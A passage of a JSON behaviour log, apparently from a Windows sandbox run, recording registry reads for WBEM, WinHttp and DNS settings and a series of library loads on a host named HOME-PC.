"HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\CLSID\\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\\InprocServer32\\InprocServer32", "content": null } }, { "event": "read", "object": "registry", "timestamp": "2025-11-20 10:58:29,781", "eid": 221, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\CLSID\\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\\InprocServer32\\(Default)", "content": null } }, { "event": "read", "object": "registry", "timestamp": "2025-11-20 10:58:29,781", "eid": 222, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\CLSID\\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\\InprocServer32\\(Default)", "content": "%systemroot%\\system32\\wbem\\fastprox.dll" } }, { "event": "read", "object": "registry", "timestamp": "2025-11-20 10:58:29,797", "eid": 223, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\CLSID\\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\\InprocServer32\\ThreadingModel", "content": "Both" } }, { "event": "read", "object": "registry", "timestamp": "2025-11-20 10:58:29,797", "eid": 224, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\CLSID\\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\\ActivateOnHostFlags", "content": null } }, { "event": "read", "object": "registry", "timestamp": "2025-11-20 10:58:29,797", "eid": 225, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\CLSID\\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\\(Default)", "content": null } }, { "event": "read", "object": "registry", "timestamp": "2025-11-20 10:58:29,797", "eid": 226, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\CLSID\\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\\(Default)", "content": "Microsoft WBEM (non)Standard Marshaling for IEnumWbemClassObject" } }, { "event": "read", "object": "registry", "timestamp": "2025-11-20 10:58:29,797", "eid": 227, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\CLSID\\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\\InprocServer32\\InprocServer32", "content": null } }, { "event": "read", "object": "registry", "timestamp": "2025-11-20 10:58:29,797", "eid": 228, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\CLSID\\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\\InprocServer32\\(Default)", "content": null } }, { "event": "read", "object": "registry", "timestamp": "2025-11-20 10:58:29,797", "eid": 229, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\CLSID\\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\\InprocServer32\\(Default)", "content": "%systemroot%\\system32\\wbem\\fastprox.dll" } }, { "event": "read", "object": "registry", "timestamp": "2025-11-20 10:58:29,797", "eid": 230, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\CLSID\\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\\InprocServer32\\ThreadingModel", "content": "Both" } }, { "event": "read", "object": "registry", "timestamp": "2025-11-20 10:58:29,797", "eid": 231, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\CLSID\\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\\AppID", "content": null } }, { "event": "read", "object": "registry", "timestamp": "2025-11-20 10:58:29,797", "eid": 232, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\Interface\\{1C1C45EE-4395-11D2-B60B-00104B703EFD}\\ProxyStubClsid32\\(Default)", "content": "{7C857801-7381-11CF-884D-00AA004B2E24}" } }, { "event": "read", "object": "registry", "timestamp": "2025-11-20 10:58:29,797", "eid": 233, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\Interface\\{423EC01E-2E35-11D2-B604-00104B703EFD}\\ProxyStubClsid32\\(Default)", "content": "{7C857801-7381-11CF-884D-00AA004B2E24}" } }, { "event": "read", "object": "registry", "timestamp": "2025-11-20 10:58:29,812", "eid": 234, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\TypeLib\\{565783C6-CB41-11D1-8B02-00600806D9B6}\\1.2\\0\\win64\\(Default)", "content": "C:\\Windows\\System32\\wbem\\wbemdisp.TLB" } }, { "event": "read", "object": "registry", "timestamp": "2025-11-20 10:58:33,922", "eid": 235, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\TypeLib\\{565783C6-CB41-11D1-8B02-00600806D9B6}\\1.2\\0\\win64\\(Default)", "content": "C:\\Windows\\System32\\wbem\\wbemdisp.TLB" } }, { "event": "read", "object": "registry", "timestamp": "2025-11-20 10:58:33,922", "eid": 236, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\TypeLib\\{00020430-0000-0000-C000-000000000046}\\2.0\\0\\win64\\(Default)", "content": "C:\\Windows\\System32\\stdole2.tlb" } }, { "event": "read", "object": "file", "timestamp": "2025-11-20 10:58:33,922", "eid": 237, "data": { "file": "C:\\Windows\\System32\\stdole2.tlb" } }, { "event": "read", "object": "file", "timestamp": "2025-11-20 10:58:33,922", "eid": 238, "data": { "file": "C:\\Windows\\System32\\stdole2.tlb" } }, { "event": "read", "object": "file", "timestamp": "2025-11-20 10:58:33,937", "eid": 239, "data": { "file": "C:\\Windows\\System32\\stdole2.tlb" } }, { "event": "read", "object": "file", "timestamp": "2025-11-20 10:58:33,937", "eid": 240, "data": { "file": "C:\\Windows\\System32\\stdole2.tlb" } }, { "event": "read", "object": "file", "timestamp": "2025-11-20 10:58:33,937", "eid": 241, "data": { "file": "C:\\Windows\\System32\\stdole2.tlb" } }, { "event": "read", "object": "file", "timestamp": "2025-11-20 10:58:33,937", "eid": 242, "data": { "file": "C:\\Windows\\System32\\stdole2.tlb" } }, { "event": "read", "object": "file", "timestamp": "2025-11-20 10:58:33,937", "eid": 243, "data": { "file": "C:\\Windows\\System32\\stdole2.tlb" } }, { "event": "read", "object": "file", "timestamp": "2025-11-20 10:58:33,953", "eid": 244, "data": { "file": "C:\\Windows\\System32\\stdole2.tlb" } }, { "event": "read", "object": "file", "timestamp": "2025-11-20 10:58:33,953", "eid": 245, "data": { "file": "C:\\Windows\\System32\\stdole2.tlb" } }, { "event": "read", "object": "file", "timestamp": "2025-11-20 10:58:33,953", "eid": 246, "data": { "file": "C:\\Windows\\System32\\stdole2.tlb" } }, { "event": "read", "object": "file", "timestamp": "2025-11-20 10:58:33,953", "eid": 247, "data": { "file": "C:\\Windows\\System32\\stdole2.tlb" } }, { "event": "read", "object": "registry", "timestamp": "2025-11-20 10:58:33,969", "eid": 248, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\WinHttp.WinHttpRequest.5.1\\CLSID\\(Default)", "content": "{2087c2f4-2cef-4953-a8ab-66779b670495}" } }, { "event": "read", "object": "registry", "timestamp": "2025-11-20 10:58:33,969", "eid": 249, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\WinHttp.WinHttpRequest.5.1\\CLSID\\(Default)", "content": "{2087c2f4-2cef-4953-a8ab-66779b670495}" } }, { "event": "read", "object": "registry", "timestamp": "2025-11-20 10:58:33,969", "eid": 250, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\CLSID\\{2087c2f4-2cef-4953-a8ab-66779b670495}\\ActivateOnHostFlags", "content": null } }, { "event": "read", "object": "registry", "timestamp": "2025-11-20 10:58:33,969", "eid": 251, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\CLSID\\{2087c2f4-2cef-4953-a8ab-66779b670495}\\(Default)", "content": null } }, { "event": "read", "object": "registry", "timestamp": "2025-11-20 10:58:33,969", "eid": 252, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\CLSID\\{2087c2f4-2cef-4953-a8ab-66779b670495}\\(Default)", "content": "WinHttpRequest Component version 5.1" } }, { "event": "read", "object": "registry", "timestamp": "2025-11-20 10:58:33,969", "eid": 253, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\CLSID\\{2087c2f4-2cef-4953-a8ab-66779b670495}\\InProcServer32\\InprocServer32", "content": null } }, { "event": "read", "object": "registry", "timestamp": "2025-11-20 10:58:33,969", "eid": 254, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\CLSID\\{2087c2f4-2cef-4953-a8ab-66779b670495}\\InProcServer32\\(Default)", "content": null } }, { "event": "read", "object": "registry", "timestamp": "2025-11-20 10:58:33,969", "eid": 255, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\CLSID\\{2087c2f4-2cef-4953-a8ab-66779b670495}\\InProcServer32\\(Default)", "content": "%SystemRoot%\\system32\\winhttpcom.dll" } }, { "event": "read", "object": "registry", "timestamp": "2025-11-20 10:58:33,969", "eid": 256, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\CLSID\\{2087c2f4-2cef-4953-a8ab-66779b670495}\\InProcServer32\\ThreadingModel", "content": "Apartment" } }, { "event": "load", "object": "library", "timestamp": "2025-11-20 10:58:33,984", "eid": 257, "data": { "file": "C:\\Windows\\System32\\winhttpcom.dll", "pathtofile": null, "moduleaddress": "0x7ffed5f30000" } }, { "event": "load", "object": "library", "timestamp": "2025-11-20 10:58:33,984", "eid": 258, "data": { "file": "winhttp.dll", "pathtofile": null, "moduleaddress": "0x7ffed8a20000" } }, { "event": "load", "object": "library", "timestamp": "2025-11-20 10:58:34,000", "eid": 259, "data": { "file": "C:\\Windows\\System32\\OnDemandConnRouteHelper.dll", "pathtofile": null, "moduleaddress": "0x7ffecb2e0000" } }, { "event": "write", "object": "registry", "timestamp": "2025-11-20 10:58:34,000", "eid": 260, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\TenantRestrictions\\Payload" } }, { "event": "write", "object": "registry", "timestamp": "2025-11-20 10:58:34,000", "eid": 261, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\TenantRestrictions\\Payload" } }, { "event": "load", "object": "library", "timestamp": "2025-11-20 10:58:34,000", "eid": 262, "data": { "file": "C:\\Windows\\System32\\mswsock.dll", "pathtofile": null, "moduleaddress": "0x7ffee0260000" } }, { "event": "load", "object": "library", "timestamp": "2025-11-20 10:58:34,031", "eid": 263, "data": { "file": "C:\\Windows\\System32\\mswsock.dll", "pathtofile": null, "moduleaddress": "0x7ffee0260000" } }, { "event": "write", "object": "registry", "timestamp": "2025-11-20 10:58:34,031", "eid": 264, "data": { "regkey": "HKEY_LOCAL_MACHINE\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters" } }, { "event": "read", "object": "registry", "timestamp": "2025-11-20 10:58:34,031", "eid": 265, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\QueryAdapterName", "content": null } }, { "event": "read", "object": "registry", "timestamp": "2025-11-20 10:58:34,031", "eid": 266, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Tcpip\\Parameters\\DisableAdapterDomainName", "content": null } }, { "event": "read", "object": "registry", "timestamp": "2025-11-20 10:58:34,031", "eid": 267, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\UseDomainNameDevolution", "content": null } }, { "event": "read", "object": "registry", "timestamp": "2025-11-20 10:58:34,031", "eid": 268, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Tcpip\\Parameters\\UseDomainNameDevolution", "content": "1" } }, { "event": "read", "object": "registry", "timestamp": "2025-11-20 10:58:34,031", "eid": 269, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\DomainNameDevolutionLevel", "content": null } }, { "event": "read", "object": "registry", "timestamp": "2025-11-20 10:58:34,031", "eid": 270, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\PrioritizeRecordData", "content": null } }, { "event": "read", "object": "registry", "timestamp": "2025-11-20 10:58:34,031", "eid": 271, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Tcpip\\Parameters\\PrioritizeRecordData", "content": null } }, { "event": "read", "object": "registry", "timestamp": "2025-11-20 10:58:34,031", "eid": 272, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\AllowUnqualifiedQuery", "content": null } }, { "event": "read", "object": "registry", "timestamp": "2025-11-20 10:58:34,031", "eid": 273, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Tcpip\\Parameters\\AllowUnqualifiedQuery", "content": null } }, { "event": "read", "object": "registry", "timestamp": "2025-11-20 10:58:34,031", "eid": 274, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\AppendToMultiLabelName", "content": null } }, { "event": "read", "object": "registry", "timestamp": "2025-11-20 10:58:34,031", "eid": 275, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\ScreenBadTlds", "content": null } }, { "event": "read", "object": "registry", "timestamp": "2025-11-20 10:58:34,031", "eid": 276, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\ScreenUnreachableServers", "content": null } }, { "event": "read", "object": "registry", "timestamp": "2025-11-20 10:58:34,031", "eid": 277, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\ScreenDefaultServers", "content": null } }, { "event": "read", "object": "registry", "timestamp": "2025-11-20 10:58:34,031", "eid": 278, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\DynamicServerQueryOrder", "content": null } }, { "event": "read", "object": "registry", "timestamp": "2025-11-20 10:58:34,031", "eid": 279, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\FilterClusterIp", "content": null } }, { "event": "read", "object": "registry", "timestamp": "2025-11-20 10:58:34,031", "eid": 280, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\WaitForNameErrorOnAll", "content": null } }, { "event": "read", "object": "registry", "timestamp": "2025-11-20 10:58:34,031", "eid": 281, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\UseEdns", "content": null } }, { "event": "read", "object": "registry", "timestamp": "2025-11-20 10:58:34,031", "eid": 282, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\DnsSecureNameQueryFallback", "content": null } }, { "event": "read", "object": "registry", "timestamp": "2025-11-20 10:58:34,031", "eid": 283, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\EnableDAForAllNetworks", "content": null } }, { "event": "read", "object": "registry", "timestamp": "2025-11-20 10:58:34,031", "eid": 284, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\DirectAccessQueryOrder", "content": null } }, { "event": "read", "object": "registry", "timestamp": "2025-11-20 10:58:34,031", "eid": 285, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\QueryIpMatching", "content": null } }, { "event": "load", "object": "library", "timestamp": "2025-11-20 10:58:34,031", "eid": 286, "data": { "file": "C:\\Windows\\System32\\rasadhlp.dll", "pathtofile": null, "moduleaddress": "0x7ffed87c0000" } }, { "event": "load", "object": "library", "timestamp": "2025-11-20 10:58:34,031", "eid": 287, "data": { "file": null, "pathtofile": null, "moduleaddress": null } }, { "event": "read", "object": "registry", "timestamp": "2025-11-20 10:58:34,031", "eid": 288, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\RegistrationTtl", "content": null } }, { "event": "read", "object": "registry", "timestamp": "2025-11-20 10:58:34,031", "eid": 289, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Tcpip\\Parameters\\DefaultRegistrationTTL", "content": null } }, { "event": "read", "object": "registry", "timestamp": "2025-11-20 10:58:34,031", "eid": 290, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\RegistrationRefreshInterval", "content": null } }, { "event": "read", "object": "registry", "timestamp": "2025-11-20 10:58:34,031", "eid": 291, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Tcpip\\Parameters\\DefaultRegistrationRefreshInterval", "content": null } }, { "event": "read", "object": "registry", "timestamp": "2025-11-20 10:58:34,031", "eid": 292, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\RegistrationMaxAddressCount", "content": null } }, { "event": "read", "object": "registry", "timestamp": "2025-11-20 10:58:34,031", "eid": 293, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Tcpip\\Parameters\\MaxNumberOfAddressesToRegister", "content": null } }, { "event": "read", "object": "registry", "timestamp": "2025-11-20 10:58:34,031", "eid": 294, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\UpdateSecurityLevel", "content": null } }, { "event": "read", "object": "registry", "timestamp": "2025-11-20 10:58:34,031", "eid": 295, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Tcpip\\Parameters\\UpdateSecurityLevel", "content": null } }, { "event": "read", "object": "registry", "timestamp": "2025-11-20 10:58:34,031", "eid": 296, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\UpdateTopLevelDomainZones", "content": null } }, { "event": "read", "object": "registry", "timestamp": "2025-11-20 10:58:34,031", "eid": 297, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\DowncaseSpnCauseApiOwnerIsTooLazy", "content": null } }, { "event": "read", "object": "registry", "timestamp": "2025-11-20 10:58:34,031", "eid": 298, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\RegistrationOverwrite", "content": null } }, { "event": "read", "object": "registry", "timestamp": "2025-11-20 10:58:34,031", "eid": 299, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\MaxCacheSize", "content": null } }, { "event": "read", "object": "registry", "timestamp": "2025-11-20 10:58:34,031", "eid": 300, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\MaxCacheTtl", "content": null } }, { "event": "read", "object": "registry", "timestamp": "2025-11-20 10:58:34,031", "eid": 301, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\MaxNegativeCacheTtl", "content": null } }, { "event": "read", "object": "registry", "timestamp": "2025-11-20 10:58:34,031", "eid": 302, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\AdapterTimeoutLimit", "content": null } }, { "event": "read", "object": "registry", "timestamp": "2025-11-20 10:58:34,031", "eid": 303, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\ServerPriorityTimeLimit", "content": null } }, { "event": "read", "object": "registry", "timestamp": "2025-11-20 10:58:34,031", "eid": 304, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\MaxCachedSockets", "content": null } }, { "event": "read", "object": "registry", "timestamp": "2025-11-20 10:58:34,031", "eid": 305, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\DisableServerUnreachability", "content": null } }, { "event": "read", "object": "registry", "timestamp": "2025-11-20 10:58:34,031", "eid": 306, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\EnableMulticast", "content": null } }, { "event": "read", "object": "registry", "timestamp": "2025-11-20 10:58:34,031", "eid": 307, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\MulticastResponderFlags", "content": null } }, { "event": "read", "object": "registry", "timestamp": "2025-11-20 10:58:34,031", "eid": 308, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\MulticastSenderFlags", "content": null } }, { "event": "read", "object": "registry", "timestamp": "2025-11-20 10:58:34,031", "eid": 309, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\MulticastSenderMaxTimeout", "content": null } }, { "event": "read", "object": "registry", "timestamp": "2025-11-20 10:58:34,031", "eid": 310, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\EnableMDNS", "content": null } }, { "event": "read", "object": "registry", "timestamp": "2025-11-20 10:58:34,031", "eid": 311, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\DnsTest", "content": null } }, { "event": "read", "object": "registry", "timestamp": "2025-11-20 10:58:34,031", "eid": 312, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\UseCompartments", "content": null } }, { "event": "read", "object": "registry", "timestamp": "2025-11-20 10:58:34,031", "eid": 313, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\CacheAllCompartments", "content": null } }, { "event": "read", "object": "registry", "timestamp": "2025-11-20 10:58:34,031", "eid": 314, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\UseNewRegistration", "content": null } }, { "event": "read", "object": "registry", "timestamp": "2025-11-20 10:58:34,031", "eid": 315, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\ResolverRegistration", "content": null } }, { "event": "read", "object": "registry", "timestamp": "2025-11-20 10:58:34,031", "eid": 316, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\ResolverRegistrationOnly", "content": null } }, { "event": "read", "object": "registry", "timestamp": "2025-11-20 10:58:34,031", "eid": 317, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\NewDhcpSrvRegistration", "content": null } }, { "event": "read", "object": "registry", "timestamp": "2025-11-20 10:58:34,031", "eid": 318, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\DirectAccessPreferLocal", "content": null } }, { "event": "read", "object": "registry", "timestamp": "2025-11-20 10:58:34,047", "eid": 319, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\DisableIdnEncoding", "content": null } }, { "event": "read", "object": "registry", "timestamp": "2025-11-20 10:58:34,047", "eid": 320, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\EnableIdnMapping", "content": null } }, { "event": "read", "object": "registry", "timestamp": "2025-11-20 10:58:34,047", "eid": 321, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\ShortnameProxyDefault", "content": null } }, { "event": "read", "object": "registry", "timestamp": "2025-11-20 10:58:34,047", "eid": 322, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\DisableNRPTForAdapterRegistration", "content": null } }, { "event": "read", "object": "registry", "timestamp": "2025-11-20 10:58:34,047", "eid": 323, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\TestMode_AdaptiveTimeoutHistoryLength", "content": null } }, { "event": "read", "object": "registry", "timestamp": "2025-11-20 10:58:34,047", "eid": 324, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\TestMode_AdaptiveTimeoutRecalculationInterval", "content": null } }, { "event": "read", "object": "registry", "timestamp": "2025-11-20 10:58:34,047", "eid": 325, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\DnsQueryTimeouts", "content": null } }, { "event": "read", "object": "registry", "timestamp": "2025-11-20 10:58:34,047", "eid": 326, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Tcpip\\Parameters\\DnsQueryTimeouts", "content": null } }, { "event": "read", "object": "registry", "timestamp": "2025-11-20 10:58:34,047", "eid": 327, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\DnsQuickQueryTimeouts", "content": null } }, { "event": "read", "object": "registry", "timestamp": "2025-11-20 10:58:34,047", "eid": 328, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Tcpip\\Parameters\\DnsQuickQueryTimeouts", "content": null } }, { "event": "write", "object": "registry", "timestamp": "2025-11-20 10:58:34,047", "eid": 329, "data": { "regkey": "HKEY_LOCAL_MACHINE\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters" } }, { "event": "read", "object": "registry", "timestamp": "2025-11-20 10:58:34,047", "eid": 330, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Tcpip\\Parameters\\Hostname", "content": null } }, { "event": "read", "object": "registry", "timestamp": "2025-11-20 10:58:34,047", "eid": 331, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Tcpip\\Parameters\\Hostname", "content": "HOME-PC" } }, { "event": "write", "object": "registry", "timestamp": "2025-11-20 10:58:34,047", "eid": 332, "data": { "regkey": "HKEY_LOCAL_MACHINE\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters" } }, { "event": "read", "object": "registry", "timestamp": "2025-11-20 10:58:34,047", "eid": 333, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Tcpip\\Parameters\\Domain", "content": null } }, { "event": "read", "object": "registry", "timestamp": "2025-11-20 10:58:34,047", "eid": 334, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Tcpip\\Parameters\\Domain", "content": "" } }, { "event": "write", "object": "registry", "timestamp": "2025-11-20 10:58:34,047", "eid": 335, "data": { "regkey": "HKEY_LOCAL_MACHINE\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters" } }, { "event": "read", "object": "registry", "timestamp": "2025-11-20 10:58:34,047", "eid": 336, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Tcpip\\Parameters\\Hostname", "content": null } }, { "event": "read", "object": "registry", "timestamp": "2025-11-20 10:58:34,047", "eid": 337, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Tcpip\\Parameters\\Hostname", "content": "HOME-PC" } }, { "event": "load", "object": "library", "timestamp": "2025-11-20 10:58:35,172", "eid": 338, "data": { "file": "C:\\Windows\\System32\\FWPUCLNT.DLL", "pathtofile": null, "moduleaddress": "0x7ffed8cb0000" } }, { "event": "load", "object": "library", "timestamp": "2025-11-20 10:58:35,172", "eid": 339, "data": { "file": null, "pathtofile": null, "moduleaddress": null } }, { "event": "load", "object": "library", "timestamp": "2025-11-20 10:58:35,172", "eid": 340, "data": { "file": null, "pathtofile": null, "moduleaddress": null } }, { "event": "load", "object": "library", "timestamp": "2025-11-20 10:58:35,172", "eid": 341, "data": { "file": null, "pathtofile": null, "moduleaddress": null } }, { "event": "load", "object": "library", "timestamp": "2025-11-20 10:58:35,172", "eid": 342, "data": { "file": null, "pathtofile": null, "moduleaddress": null } }, { "event": "load", "object": "library", "timestamp": "2025-11-20 10:58:35,172", "eid": 343, "data": { "file": null, "pathtofile": null, "moduleaddress": null } }, { "event": "load", "object": "library", "timestamp": "2025-11-20 10:58:35,187", "eid": 344, "data": { "file": null, "pathtofile": null, "moduleaddress": null } }, { "event": "load", "object": "library", "timestamp": "2025-11-20 10:58:35,187", "eid": 345, "data": { "file": null, 